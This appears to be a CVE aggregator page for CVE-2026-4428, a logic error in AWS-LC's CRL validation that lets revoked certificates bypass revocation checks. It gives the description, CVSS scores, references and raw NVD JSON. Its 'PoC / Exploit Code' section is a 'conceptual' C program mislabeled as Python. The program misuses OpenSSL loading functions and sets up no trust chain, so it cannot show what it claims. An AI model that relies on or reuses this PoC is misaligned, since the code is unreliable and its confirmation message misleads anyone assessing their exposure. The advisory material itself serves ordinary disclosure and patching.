CVE-2026-4428

Description

A logic error in CRL distribution point validation in AWS-LC before 1.71.0 causes partitioned CRLs to be incorrectly rejected as out of scope, which allows a revoked certificate to bypass certificate revocation checks. To remediate this issue, users should upgrade to AWS-LC 1.71.0 or AWS-LC-FIPS-3.3.0.

CVSS Details

CVSS Score

7.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

AWS-LC < 1.71.0

AWS-LC-FIPS < 3.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <openssl/x509.h>
#include <stdio.h>

// Conceptual Proof of Concept for CVE-2026-4428
// Demonstrates that a revoked certificate is accepted due to partitioned CRL logic error.

int main() {
    printf("Testing CVE-2026-4428: AWS-LC CRL Validation Bypass\n");
    
    // 1. Load a revoked certificate
    X509 *cert = X509_load_cert_file("revoked_cert.pem", X509_FILETYPE_PEM);
    // 2. Load a partitioned CRL that contains the serial number of the revoked cert
    X509_CRL *crl = X509_load_crl_file("partitioned_crl.pem", X509_FILETYPE_PEM);
    
    X509_STORE *store = X509_STORE_new();
    X509_STORE_add_crl(store, crl);
    // Enable CRL checking
    X509_STORE_set_flags(store, X509_V_FLAG_CRL_CHECK);

    X509_STORE_CTX *ctx = X509_STORE_CTX_new();
    X509_STORE_CTX_init(ctx, store, cert, NULL);

    // 3. Verify the certificate
    int result = X509_verify_cert(ctx);

    if (result == 1) {
        // In a patched version, this should fail.
        // In vulnerable versions (< 1.71.0), logic error ignores the partitioned CRL.
        printf("[!] VULNERABILITY CONFIRMED: Revoked certificate was accepted.\n");
    } else {
        printf("[+] Check passed: Certificate correctly rejected.\n");
    }

    X509_STORE_CTX_free(ctx);
    X509_STORE_free(store);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4428
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4428
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4428/
[4] VulDB https://vuldb.com/cve/CVE-2026-4428
[5] https://aws.amazon.com/security/security-bulletins/2026-010-AWS/
[6] https://github.com/aws/aws-lc/releases/tag/v1.71.0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4428", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-03-19T21:17:14.170", "lastModified": "2026-03-20T13:39:46.493", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A logic error in CRL distribution point validation in AWS-LC before 1.71.0 causes partitioned CRLs to be incorrectly rejected as out of scope, which allows  a revoked certificate to bypass certificate revocation checks.\n\nTo remediate this issue, users should upgrade to AWS-LC 1.71.0 or AWS-LC-FIPS-3.3.0."}, {"lang": "es", "value": "Un error lógico en la validación del punto de distribución de CRL en AWS-LC anterior a 1.71.0 provoca que las CRL particionadas sean rechazadas incorrectamente por estar fuera de alcance, lo que permite que un certificado revocado eluda las comprobaciones de revocación de certificados.\n\nPara remediar este problema, los usuarios deben actualizar a AWS-LC 1.71.0 o AWS-LC-FIPS-3.3.0."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-299"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-010-AWS/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-lc/releases/tag/v1.71.0", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}